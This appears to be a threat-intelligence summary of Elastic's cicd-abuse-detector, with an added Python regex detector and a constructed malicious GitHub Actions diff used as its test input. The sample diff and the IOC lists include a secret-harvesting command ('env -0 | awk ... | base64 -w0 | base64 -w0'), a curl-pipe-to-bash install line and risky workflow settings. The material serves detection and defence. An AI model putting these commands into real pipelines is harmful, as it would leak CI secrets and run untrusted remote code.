Elastic Security Labs open-sourced cicd-abuse-detector, a drop-in CI template that uses 50+ regex signals plus LLM (Claude) analysis to detect suspicious CI/CD workflow changes across GitHub Actions, GitLab CI, and Azure DevOps. The project is validated against real incidents and offensive toolkits (e.g., Nord Stream, ArtiPACKED, HackerBot-Claw, GhostAction, Shai-Hulud) and produces structured JSON verdicts with optional Elasticsearch logging for cross-platform correlation. #GhostAction #HackerBotClaw
Keypoints
- Attackers increasingly target CI/CD automation rather than production servers, using stolen developer credentials to modify workflows and exfiltrate secrets at scale.
- Elastic released cicd-abuse-detector: a dependency-light CI workflow that extracts 50+ regex and metadata signals from diffs and uses Claude for structured threat analysis.
- The detector works across GitHub Actions, GitLab CI, and Azure DevOps, diffing files per-file (10,000 char cap) and categorizing changed paths into three CI-relevant tiers.
- Detection patterns were tested against offensive tooling and real incidents (Nord Stream, Gato-X, ArtiPACKED, HackerBot-Claw, GhostAction, Shai-Hulud) and ship with 19 malicious and 4 benign example diffs plus an automated test suite.
- Key threat vectors include credential harvesting, privileged trigger exploitation (pull_request_target), permission escalation (id-token/write), runner targeting, supply chain manipulation (mutable action refs, curl|bash), and defense evasion via backdated commits.
- The workflow outputs structured JSON verdicts (severity, confidence, reasoning, evidence, recommendations), can alert via GitHub/Slack/issues, fail PRs, and optionally index verdicts into Elasticsearch for correlation.
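Added example (not the cicd-abuse-detector's own code): a minimal regex signal pass over a constructed GitHub Actions workflow diff that illustrates the three ideas in the key points above, per-file diffing with a character cap, tiering changed paths by CI relevance, and a structured JSON verdict with severity, confidence, reasoning, evidence and recommendations. The signal names, tier labels, severity weights, downgrade rule for non-CI paths, recommendation text and the sample diff are all this example's own assumptions; the real project's 50+ signals and LLM stage are not reproduced here.

```python
"""Added example, not the cicd-abuse-detector's own code: regex signals over
a constructed workflow diff, emitting a JSON verdict shaped like the article's.
Signal names, tiers, severities, recommendations and the sample are assumptions."""
import json
import re

# Assumed path tiers, modelled on the article's "three CI-relevant tiers".
TIER_PATTERNS = [
    ("ci-config", re.compile(r"^(\.github/workflows/[^/]+\.ya?ml|\.gitlab-ci\.ya?ml|azure-pipelines\.ya?ml)$")),
    ("ci-adjacent", re.compile(r"^(\.github/|\.devcontainer/|\.vscode/|Dockerfile$|.*\.lock$)")),
]

def classify_path(path: str) -> str:
    """Map a changed file path to a tier; anything not CI-related is 'other'."""
    for tier, pattern in TIER_PATTERNS:
        if pattern.search(path):
            return tier
    return "other"

# Regex signals applied only to lines the diff ADDS; severities and
# recommendations are assumed values for this example.
SIGNALS = [
    ("privileged_trigger", r"pull_request_target", "high",
     "Justify a fork-readable trigger with secrets access; prefer pull_request."),
    ("id_token_write", r"id-token:\s*write", "medium",
     "Confirm the job needs OIDC token minting; scope permissions per job."),
    ("mutable_action_ref", r"uses:\s*\S+@(main|master)\b", "medium",
     "Pin third-party actions to a full commit SHA."),
    ("remote_script_exec", r"\bcurl\b[^|\n]*\|\s*(bash|sh|node)\b", "high",
     "Vendor and review the script instead of piping it from the network."),
    ("env_dump", r"\benv\s+-0\b|\bprintenv\b", "high",
     "Dumping the environment exposes injected secrets; remove or justify."),
    ("double_base64", r"base64[^|\n]*\|\s*base64", "high",
     "Nested encoding commonly evades secret masking; treat as exfiltration."),
    ("all_secrets_to_shell", r"\$\{\{\s*toJSON\(secrets\)\s*\}\}", "critical",
     "Never serialise the whole secrets context; pass secrets individually."),
]
COMPILED = [(n, re.compile(p), s, r) for n, p, s, r in SIGNALS]
RANK = {"none": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}
# Assumed rule: a hit in a non-CI file is one level less severe.
DOWNGRADE = {"critical": "high", "high": "medium", "medium": "low", "low": "low"}

def added_lines_per_file(diff: str) -> dict:
    """Tiny unified-diff reader: returns {path: [added lines]}."""
    files, current = {}, None
    for line in diff.splitlines():
        if line.startswith("+++ b/"):
            current = line[len("+++ b/"):]
            files[current] = []
        elif current is not None and line.startswith("+") and not line.startswith("+++"):
            files[current].append(line[1:])
    return files

def analyze(diff: str, max_chars: int = 10_000) -> dict:
    """Run every signal over each file's added text, capped per file like the article's 10,000-char limit."""
    evidence = []
    for path, lines in added_lines_per_file(diff).items():
        tier = classify_path(path)
        text = "\n".join(lines)[:max_chars]
        for name, pattern, severity, rec in COMPILED:
            for m in pattern.finditer(text):
                sev = DOWNGRADE[severity] if tier == "other" else severity
                evidence.append({"file": path, "tier": tier, "signal": name,
                                 "severity": sev, "match": m.group(0), "recommendation": rec})
    if not evidence:
        return {"verdict": "benign", "severity": "none", "confidence": 0.8,
                "reasoning": "no CI-abuse signals in added lines", "evidence": [], "recommendations": []}
    top = max((e["severity"] for e in evidence), key=RANK.__getitem__)
    distinct = sorted({e["signal"] for e in evidence})
    confidence = min(0.95, 0.5 + 0.1 * len(distinct))  # assumed heuristic: more independent signals, more confidence
    return {
        "verdict": "suspicious",
        "severity": top,
        "confidence": round(confidence, 2),
        "reasoning": f"{len(evidence)} hit(s) across {len(distinct)} signal type(s)",
        "evidence": evidence,
        "recommendations": sorted({e["recommendation"] for e in evidence}),
    }

# Constructed sample diff exercising several of the article's threat vectors.
SAMPLE_DIFF = """\
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,7 +1,11 @@
 name: ci
-on: [pull_request]
+on: [pull_request_target]
+permissions:
+  id-token: write
 jobs:
   build:
     steps:
-      - uses: actions/setup-node@v4
+      - uses: actions/setup-node@main
+      - run: env -0 | awk -v RS='0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1 +1,2 @@
 # project
+Run `curl https://example.invalid/install.sh | bash` to install.
"""

if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_DIFF), indent=2))
```

On the sample diff the workflow file lands in the ci-config tier and trips five signals (privileged trigger, id-token write, mutable ref, env dump, double base64), giving a high-severity verdict; the same curl | bash string in README.md is recorded but downgraded to medium because the path is outside the CI tiers, which is the kind of path-aware weighting that keeps documentation edits from drowning out workflow changes.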
MITRE Techniques
- [T1552] Unsecured Credentials – Attackers steal developer credentials to modify workflows and harvest CI secrets ("Stolen developer credentials → Modified workflow file → Harvested CI secrets → Lateral movement to cloud and production")
- [T1195] Supply Chain Compromise – Adversaries manipulate actions, dependencies, or release artifacts to introduce malicious code or exfiltration ("Supply chain manipulation through mutable action references (using @main instead of SHA-pinned versions), remote script execution (curl | bash), lockfile registry swaps, and dependency poisoning")
- [T1070.006] Timestomp – Defense evasion by backdating commits to make malicious files appear old and trusted ("Defense evasion via commit timestamp manipulation, making malicious files appear old and trusted")
- [T1059] Command and Scripting Interpreter – Use of shell/command constructs to harvest or exfiltrate secrets and achieve RCE (e.g., double base64, curl|bash, LD_PRELOAD techniques) ("env -0 | awk -v RS='0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0" and "curl | bash")
Indicators of Compromise
- [File diffs] Example malicious/benign diff filenames used for detection and testing – nord-stream-pipeline-exfil.diff, github-env-injection.diff, and 21 more example diffs
- [File paths / configs] Developer and repo files used as initial access or leak vectors – .vscode/tasks.json, .git/config (artifact upload leaks), and other devcontainer/.dev files
- [Commands / payload patterns] Shell payloads and encodings used to exfiltrate or execute code – "env -0 | awk -v RS='0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0", "curl | node" (LD_PRELOAD and double-base64 patterns), and other payload strings
- [Credentials / tokens] Types of credentials targeted or stolen in incidents – GITHUB_TOKEN, GitHub Personal Access Tokens (PATs), id-token (OIDC) and short-lived tokens referenced in attacks
- [Action / workflow references] CI action and workflow patterns that indicate risk or misconfiguration – azure/login@v1 (id-token: write), actions/setup-node@main (mutable reference), and examples of actions/checkout behaviors that persist tokens
Read more: https://www.elastic.co/security-labs/detecting-cicd-pipeline-abuse-with-llm-augmented-analysis